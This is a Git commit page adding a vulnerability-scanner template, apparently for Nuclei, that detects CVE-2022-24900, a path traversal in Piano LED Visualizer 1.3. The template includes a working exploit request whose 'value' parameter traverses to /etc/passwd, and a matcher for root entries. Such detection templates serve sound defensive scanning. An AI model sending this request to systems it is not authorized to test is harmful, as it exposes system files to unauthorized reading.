Merge pull request #4506 from Akokonunes/patch-152

Create CVE-2022-24900.yaml
patch-1
Prince Chaddha 2022-05-30 18:10:31 +05:30 committed by GitHub
commit a72cd0b3ca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: CVE-2022-24900
info:
name: Piano LED Visualizer 1.3 - Directory traversal
author: 0x_Akoko
severity: high
description: |
Piano LED Visualizer is software that allows LED lights to light up as a person plays a piano connected to a computer. Version 1.3 and prior are vulnerable to a path traversal attack.
reference:
- https://github.com/onlaj/Piano-LED-Visualizer/issues/350
- https://vuldb.com/?id.198714
- https://www.cvedetails.com/cve/CVE-2022-24900/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-24900
cwe-id: CWE-22
tags: lfi,cve2022,cve,piano,iot,oss
requests:
- method: GET
path:
- "{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200